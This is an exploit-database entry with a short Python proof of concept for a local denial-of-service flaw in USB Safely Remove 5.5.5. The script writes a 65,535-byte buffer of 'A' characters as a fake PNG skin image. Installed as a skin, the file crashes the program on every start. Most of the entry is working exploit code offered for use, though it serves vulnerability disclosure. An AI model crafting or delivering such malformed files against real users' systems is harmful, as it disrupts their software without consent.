USB Safely Remove 5.5.5 Denial Of Service

2017.09.04
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: USB Safely Remove 5.5.5 - Denial of Service # Date of Discovery: August 31 2017 # Exploit Author: Rithwik Jayasimha # Author Homepage/Contact: https://thel3l.me # Vendor Name: Crystal Rich Ltd. # Vendor Homepage: https://safelyremove.com # Software Link: https://safelyremove.com/startdownload.htm?v=5.5 # Affected Versions: <=5.5.5.1250 # Tested on: Windows 7 # Category: local # Vulnerability type: Denial of Service # Description ''' USB Safely Remove versions < 5.5.5 crash when a skin containing a malformed png image is usedself. The skins can be found under <program path>/skins and if the user is sent a skin containing a malformed skin, the program crashes. Additionally, it will refuse to start again (beacause it keeps crashing until the directory containing the installed skin is removed.)''' # 0012EF68 41 41 41 41 41 41 41 41 AAAAAAAA # Generate a .png file using the python script and replace any of the default skin images. file = "crash.png" buffer = "A" * 65535 f = open(file, "w") f.write(buffer) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top